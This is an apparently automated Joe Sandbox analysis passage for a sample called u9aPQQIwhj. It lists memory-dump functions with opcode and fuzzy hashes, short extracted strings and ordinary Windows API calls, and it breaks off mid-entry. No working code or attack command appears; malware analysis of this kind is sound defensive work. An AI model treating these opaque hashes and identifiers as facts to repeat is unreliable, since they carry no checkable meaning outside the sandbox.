API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 15a5811767a4c6a38f8b00312ee1436f219bc93d810c569a47352fe1d2183d71
Instruction ID: 64bbbbee48cda617b28eef47ebbabf952ccc43f56ab17547755a70dc6ee7f5a1
Opcode Fuzzy Hash: 15a5811767a4c6a38f8b00312ee1436f219bc93d810c569a47352fe1d2183d71
Instruction Fuzzy Hash: D8619030B002089FEB149FA5C8557AEBBF6FF88340F208569E105AB391DF759D458F91

Function 39049200 Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 39049280
$^q, xrefs: 390492BB

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: fdac36bf44031fc13ab20de2f5d485b0e280aeb4063dcb349be60b12a15e18da
Instruction ID: 2a86dfc5d3eac4ac26b622ed2a4ba15c20798970c83ee0344ca210e1ed66d1f0
Opcode Fuzzy Hash: fdac36bf44031fc13ab20de2f5d485b0e280aeb4063dcb349be60b12a15e18da
Instruction Fuzzy Hash: ED516E30B442059FDB44DB64C990BAE77F6AFC8744F108979C50AEB345EA34EC428FA6

Function 39044C59 Relevance: 2.6, Strings: 2, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 39044C93
XPcq, xrefs: 39044DB9

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 6270fe32ef3ad833af0fb26bccadda88315465ec43edd424288f2014c383134f
Instruction ID: f1be77b5a4615807e894715ae0d30fa742f17707afc6006ff1c65c79921f94eb
Opcode Fuzzy Hash: 6270fe32ef3ad833af0fb26bccadda88315465ec43edd424288f2014c383134f
Instruction Fuzzy Hash: 39516F70B002089FEB159FB9C855BAEBBF7BFC8700F208529E145AB395DA759C058F91

Function 3889D7E4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3889D902

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e49121f9de33a1f180959d5e1335d43da946cc89667f43f6fdacb6b8af84b2b
Instruction ID: 10c0a4998deba2a749c17ab13a88387f82165466b3cb3643acd0a00104183030
Opcode Fuzzy Hash: 1e49121f9de33a1f180959d5e1335d43da946cc89667f43f6fdacb6b8af84b2b
Instruction Fuzzy Hash: 2A51E0B0D00319DFDB14CFAAC884ADEBBF5BF48314F60812AE819AB211D7709885CF94

Function 3889D7F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3889D902

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8d80707b791ef40b7ac1cea33b988c58393159c43bda6cf3119a9916b4294a77
Instruction ID: 8e5e36fbea63dccfce80af3b5f4112eb9c77f87edb980a5665f4f6e50dbdce74
Opcode Fuzzy Hash: 8d80707b791ef40b7ac1cea33b988c58393159c43bda6cf3119a9916b4294a77
Instruction Fuzzy Hash: B741C0B1D003099FDB14CFAAC880ADEBBF5BF48314F60812AE819AB211D7719945CF95

Function 39410040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 39410101

Memory Dump Source

Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3cb48824604c73b8e67c3f9e00db9393db0f5131f43c882f97a4a1967b444c27
Instruction ID: 3add12bfe64dd4555eb7b48dfa80836e5a892b5cd527ba754d4ba023d732866d
Opcode Fuzzy Hash: 3cb48824604c73b8e67c3f9e00db9393db0f5131f43c882f97a4a1967b444c27
Instruction Fuzzy Hash: EA4129B8A00309CFDB04CF9AC848A9ABBF5FF89314F24C459D558AB321D775A941CFA0

Function 38893450 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 388934DF

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0bb1096b9194a33c09b69c51dbc7891383d3e2bb384e27fae3de13ff173948df
Instruction ID: c9f19237961f34c072d0a51a73c436705133063f112fa2b57f4de9a96d99dcec
Opcode Fuzzy Hash: 0bb1096b9194a33c09b69c51dbc7891383d3e2bb384e27fae3de13ff173948df
Instruction Fuzzy Hash: 552103B5D00248AFDB10CFAAD484ADEBFF8FB48310F14805AE954A7310D375A950CFA1

Function 38893458 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 388934DF

Memory Dump Source

Source File: 00000004.00000002.2937143939.0000000038890000.00000040.00000800.00020000.00000000.sdmp, Offset: 38890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_38890000_u9aPQQIwhj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 31351f7b800bc6e654fa2b5192650313ec23560eb7cf0d6702e3caead5ae98b1
Instruction ID: c9cb27019c9c5b60db52e997bb2bf14b6e6a7f87e8ee28de6bab633225d02d1e
Opcode Fuzzy Hash: 31351f7b800bc6e654fa2b5192650313ec23560eb7cf0d6702e3caead5ae98b1
Instruction Fuzzy Hash: D921F5B59002189FDB10CFAAD584ADEFFF4FB48310F14801AE954A3310D375A954CFA5

Function 39412570 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 394125CD

Memory Dump Source

Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a41ac4e7e381cbf6a8b8bf9331538024e974f89c62fb01ee10bbf1b4c8197f11
Instruction ID: 8dc01b4d2602d42bf578904a7b72947aae8963aab52045ff61c1d5c31d9cf41c
Opcode Fuzzy Hash: a41ac4e7e381cbf6a8b8bf9331538024e974f89c62fb01ee10bbf1b4c8197f11
Instruction Fuzzy Hash: 5F1130B09007488FCB10DFAAD884BCEBFF4EB48320F20845AD558A7250D379A984CFA5

Function 39411780 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 394125CD

Memory Dump Source

Source File: 00000004.00000002.2937450476.0000000039410000.00000040.00000800.00020000.00000000.sdmp, Offset: 39410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39410000_u9aPQQIwhj.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6159a2e276be2e1d8872a61c3b92d15526c178d875167a31fe6d103bfe170179
Instruction ID: e402fd1ab6d5bd2c1ab61bb84c49ebd34222ed3cbfc4d95ca3a55fe6d7ab8662
Opcode Fuzzy Hash: 6159a2e276be2e1d8872a61c3b92d15526c178d875167a31fe6d103bfe170179
Instruction Fuzzy Hash: 811112B59047488FCB20DFAAD584BDEFBF8EB48320F20845AD558A7310D375AA44CFA5

Function 0015F2C8 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0015F592

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: c2e7a197ea4d83a3f3118e9bcd48c8e613471bed3b4783419f01d2990b64fcdb
Instruction ID: aa0e479e26204aea66eb5482f74b913b2595a00fbbbe6821394f50b48ba04ab9
Opcode Fuzzy Hash: c2e7a197ea4d83a3f3118e9bcd48c8e613471bed3b4783419f01d2990b64fcdb
Instruction Fuzzy Hash: A581E131B00205DFDB159B68D4942AEBBA2EB89311F24847DD816EF345EB35DC4BCB91

Function 00157CA0 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00157DDD

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: ffaa1a687b6c85ec46fea73cffeeb7860a7659cfb059cacc4dee52d89832844d
Instruction ID: d7dce30330bc3f3fc2fd407de5a084c76547563ba1cb378f010470798a22e029
Opcode Fuzzy Hash: ffaa1a687b6c85ec46fea73cffeeb7860a7659cfb059cacc4dee52d89832844d
Instruction Fuzzy Hash: 98318E70E14309CFDB15CBA5D8466AEBBB1FF96301F10446AE821EB290E7749D4A8B51

Function 001551C8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

LR^q, xrefs: 001552C3

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 9a08ce21b131f702b24eb2c772af080515465d3c8476284767ffb152068276f1
Instruction ID: 34c2723a933ce750c8873929a85a34b729ffe8eae37f5ac098a45092435314d4
Opcode Fuzzy Hash: 9a08ce21b131f702b24eb2c772af080515465d3c8476284767ffb152068276f1
Instruction Fuzzy Hash: 7741C431B00912CFDB249A78C4A166E77A2EF95711F608929E86ADF394DB34EC46C7C1

Function 001551B7 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

LR^q, xrefs: 001552C3

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 92ded29c99c9851e4bd6a6deeebe39cca26dd0494c8cf33b44bcefcd529cfa02
Instruction ID: 61744bde4418a0f429ae3122d2c201a91b8690d7d14e88385b66be71c711829d
Opcode Fuzzy Hash: 92ded29c99c9851e4bd6a6deeebe39cca26dd0494c8cf33b44bcefcd529cfa02
Instruction Fuzzy Hash: C241D430B00A11CFDB249A78C4A176E77A3EF95711F204529E86ADF294D734ED49C7C2

Function 3904DB7D Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

PH^q, xrefs: 3904DCD9

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 8076f93672cdff8fed94093efdc5a02a8c1b78c30891b03288c13b207b3bf63b
Instruction ID: 126337a10ab11128ea5fe1652303c3ae606e19fdd0ed60bc6c507486e7ff81cd
Opcode Fuzzy Hash: 8076f93672cdff8fed94093efdc5a02a8c1b78c30891b03288c13b207b3bf63b
Instruction Fuzzy Hash: 0741CF71A0034A9FEB01DFA5C85469EBBF2BF85340F2149BAD415EB240EB70B946CF81

Function 0015F480 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0015F592

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: d77fd5483425e82fc955496085484762d5669ccab2907f15635dfca2b88db261
Instruction ID: 02e068bdd7d4db868417a568bc0de19a55b5e50aee0aa109579078a29fc21843
Opcode Fuzzy Hash: d77fd5483425e82fc955496085484762d5669ccab2907f15635dfca2b88db261
Instruction Fuzzy Hash: 8C31EE31B002019FDB199F34D5542AE77A2ABC9301F20493CD806EB391EF35DD4ACB91

Function 390421F8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 39042333

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 5ae8676deb51e1f20527f7fd1f3ee5b9cd8d5d368bcc20122294e92c12d77040
Instruction ID: a6ec87bae124a382142227d6a6c02e16279fd7771b86f6c16659357dd3951093
Opcode Fuzzy Hash: 5ae8676deb51e1f20527f7fd1f3ee5b9cd8d5d368bcc20122294e92c12d77040
Instruction Fuzzy Hash: A9319E317002019FEB05AB78C5556AF7AE3AFC9250F1089B8D406EB391DE39ED468FA1

Function 00157D58 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00157DDD

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 799f998ac00ca66ba332b98fbeca31bfbf057529cefc95c23d4e32ec18506e59
Instruction ID: 0c04d683d53675c3649ec576eae21b59aa78aa94307cd7d92cb5c98a1a590cf5
Opcode Fuzzy Hash: 799f998ac00ca66ba332b98fbeca31bfbf057529cefc95c23d4e32ec18506e59
Instruction Fuzzy Hash: 82316370E14209DFDF14CBA5E8467AEB7B1FF85315F10446AE825EB280D7709D4ACB41

Function 0015E298 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

|, xrefs: 0015E2F8

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: d87dcd94805aa865e314de392ef990d40f5c646ef0939c24117c702c7bb57149
Instruction ID: 9ac10a1e06c1a86f077b253103f5bba1bec6c3f8cecf68923f32cfaec81fd4c2
Opcode Fuzzy Hash: d87dcd94805aa865e314de392ef990d40f5c646ef0939c24117c702c7bb57149
Instruction Fuzzy Hash: 88216D70F00214DFDB449BB8C804B5EBBF1AF4D700F1484A9E95AEB3A0EB359901CB91

Function 0015E2A8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0015E2F8

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: b580de83a65ef3ab1d14e61594628913e6ed568b1b853b2a9012375ce6cd8d03
Instruction ID: ccd06a833dfd62ff4686788d507820186b9cfbbf8e05bfcc02361fa294c64ba8
Opcode Fuzzy Hash: b580de83a65ef3ab1d14e61594628913e6ed568b1b853b2a9012375ce6cd8d03
Instruction Fuzzy Hash: 88115E74F00215DFDB449B78C804B6E77F1AF48700F10846AE91AEB3A0DB7599018B91

Function 00156B60 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00156B97

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 68cfd66b8e313eac688cc2c9d5271fc61cf100b8caebba06551406d39c5023cd
Instruction ID: dc0b46aba6df380c1e1616cc0a516013d9f87bd3b4602e9422356591cade99f7
Opcode Fuzzy Hash: 68cfd66b8e313eac688cc2c9d5271fc61cf100b8caebba06551406d39c5023cd
Instruction Fuzzy Hash: 1F1170317092809FC706AB78942469D7FB2AF8B700B1544EFD096CB2A3DA365949C792

Function 39048390 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$^q, xrefs: 390483DB

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: d4e815e811be6651823acb697782f18983dc831dfa0f42385191f2f489d90d77
Instruction ID: 7bb6be2df9d6e12ff40f89276e344d7be792d3899fa29c7a974ec48330a7b932
Opcode Fuzzy Hash: d4e815e811be6651823acb697782f18983dc831dfa0f42385191f2f489d90d77
Instruction Fuzzy Hash: B5F08C39A002049FEF188A48EAC26AD73A5EB80395F104CB6DE04EB241DB25E946CFD1

Function 001587B9 Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3c3ecfbd87c1be48ccca686f11618aac15375003de34c335fb65da52ab3828
Instruction ID: 0aba39de0d40297207ad1b6b40de4b1fac7ea402b3fbff27d439208a480ac47e
Opcode Fuzzy Hash: da3c3ecfbd87c1be48ccca686f11618aac15375003de34c335fb65da52ab3828
Instruction Fuzzy Hash: 95127E30B00105DFCB15AB28D895269B3A3FBC5345B604A3EE415EB366CF75ED8B9B81

Function 0015A220 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4e52f00a32c152b8ad517b3a79a026685cdaf1c23e142484033ac198a6a532
Instruction ID: 6e813115e6bdd223207f07f4e5a6739b827925d3bd0bec75ef3c720849f58337
Opcode Fuzzy Hash: ea4e52f00a32c152b8ad517b3a79a026685cdaf1c23e142484033ac198a6a532
Instruction Fuzzy Hash: 3FD19135A00105DFCB14DBB4C594AADBBB2EF88311F648529E816EB361DB31DD4ACB92

Function 0015DD90 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafdd523aee7c34ff095d1aceb568f9e52d26ed85e7f2e7841cee2024d929e36
Instruction ID: 60e8711060e7b669c7413e3b34b838a197681509aa4d730e985e40df8cb5f149
Opcode Fuzzy Hash: fafdd523aee7c34ff095d1aceb568f9e52d26ed85e7f2e7841cee2024d929e36
Instruction Fuzzy Hash: 99B1D031B00215DFDB25DB38C880A6ABBB6EF85310F248566E859DF295DB31EC4AC791

Function 00154A4F Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c859577e8c01f01389ad49569a30864558db311de281ea6dce6e88e6833b3f
Instruction ID: e0f7f1c2ba5a0b78c030e93763a88883677bfeadce16fe1975c3e9e799ab8e44
Opcode Fuzzy Hash: 95c859577e8c01f01389ad49569a30864558db311de281ea6dce6e88e6833b3f
Instruction Fuzzy Hash: 1FB14E70E00209CFDF10CFA9D9957DDBBF1AF88319F148129D869EB254EB749889CB81

Function 00153E34 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a20daf8df9e1b6719bfa3ff6fb57e5fc68377c88ebb2f9c364d91cc653d0005
Instruction ID: 9bca18faa4425280738340d3badb3f6642e2cf024442ef498b60a84c2bdc1243
Opcode Fuzzy Hash: 8a20daf8df9e1b6719bfa3ff6fb57e5fc68377c88ebb2f9c364d91cc653d0005
Instruction Fuzzy Hash: F2917070E00609CFDF10CFA8C9857DDBBF1AF48355F248529E825EB294EB749989CB91

Function 390462C0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899ccdf10a10b067c2bfebb7a901bae31db866b28ebc37e85e545475c5d0eb5a
Instruction ID: fe95d750bccc99dadf19375f268acac7374b02fff6c87d25780c880e36939460
Opcode Fuzzy Hash: 899ccdf10a10b067c2bfebb7a901bae31db866b28ebc37e85e545475c5d0eb5a
Instruction Fuzzy Hash: 9261B171F001214FDB04AA7EC89466FBAD7AFC5660B15447AD80EDB360EE65ED028BC6

Function 390446B8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a56f86d58c487a8192beeefab0bafa5ad50b5213871e6c7edc664b655fdc869
Instruction ID: 286d0b52889f1a70cba1e53c2ddc59f73c611cf59a478662b077c6b9bd5a02e4
Opcode Fuzzy Hash: 8a56f86d58c487a8192beeefab0bafa5ad50b5213871e6c7edc664b655fdc869
Instruction Fuzzy Hash: BC913F34E006598FEB10DF68C891B8DB7B1FF85310F208AA9D549AB355DB70AA86CF51

Function 3904439A Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7844a4364f143d39f32106c873dfcea40de91996b1fb4896fed5b46c77fcd3
Instruction ID: b4848b91e9f83bd1b853d9647f1174513b596e2009945d0409512d1119492f68
Opcode Fuzzy Hash: 3d7844a4364f143d39f32106c873dfcea40de91996b1fb4896fed5b46c77fcd3
Instruction Fuzzy Hash: 2F812B35B002059FDB04DBA8C49479EB7F2AFC9744F108979D40AEB395EB75EC468B82

Function 0015A750 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d291378b176cca393bcbe36a58242b28c8564830eb1853f4a63fdc000d71cd
Instruction ID: 627a0b51a914264a6a6f86b84102cabbe3709cd78c76680a5bfddf3c0722f67e
Opcode Fuzzy Hash: c6d291378b176cca393bcbe36a58242b28c8564830eb1853f4a63fdc000d71cd
Instruction Fuzzy Hash: 9A818B71A40204CFDB04CF69D884B9DBBB2FF88315F14C2A9E919AB395D7719C49CB91

Function 390443A7 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a317bbf22504c8bf3ce6e659c59a450d1165cf2e6f3cab2d181c9eb1e3d673
Instruction ID: 0f2a267ffc81e94f461cd4262887ad1cb8ec91a87abe1ae1a9861f8e3ccd031e
Opcode Fuzzy Hash: d0a317bbf22504c8bf3ce6e659c59a450d1165cf2e6f3cab2d181c9eb1e3d673
Instruction Fuzzy Hash: 56814E35B002059FDB04DBA8C49479EB7F2AFC9744F108979D40AEB395EB75EC468B82

Function 390446D0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe098fc327b7517623e0b7a1af6fc9bd8fcb40d4ef4f7173cd88ae29f6c18b0
Instruction ID: 3683848b192f19bb55efd721634e5f1db15563c0bde45a7708a7491c1ec0b5ba
Opcode Fuzzy Hash: cbe098fc327b7517623e0b7a1af6fc9bd8fcb40d4ef4f7173cd88ae29f6c18b0
Instruction Fuzzy Hash: 4F913034E006198BEB10DF68C881B8DB7F1FF89310F2089A9D549BB355DB70AA86CF51

Function 001547D0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91605fafaeb860ae1552e2e0c9084acb80033a1d49d301d2fb9af385f6c63d03
Instruction ID: 2435bc3241a6d843ec05d2bd88a2a3c51e1c40fca0d9ec75bf6890e48f01533e
Opcode Fuzzy Hash: 91605fafaeb860ae1552e2e0c9084acb80033a1d49d301d2fb9af385f6c63d03
Instruction Fuzzy Hash: BD718070E00249DFDF14CFA9D8857DEBBF1BF88319F148129D825AB254EB749889CB81

Function 001547CC Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915588696.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d58c011b0f2a87e721913cd4de350c1126518d2acf392fe78ab920e29577dcd
Instruction ID: 3797aa9068310a85b4bfb6e0b23856748dc86ad50be4c5ca48f77e33d525be64
Opcode Fuzzy Hash: 7d58c011b0f2a87e721913cd4de350c1126518d2acf392fe78ab920e29577dcd
Instruction Fuzzy Hash: 7F719070D00249DFDF14CFA9D8457DEBBF1BF88318F148129E825AB254EB749889CB91

Function 3904FC68 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

